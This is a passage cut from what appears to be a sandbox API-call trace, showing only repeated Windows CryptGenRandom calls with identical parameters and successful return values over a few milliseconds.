pbBuffer=0x2d7dc70) returned 1 [0157.303] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.303] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.304] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.305] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.306] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, 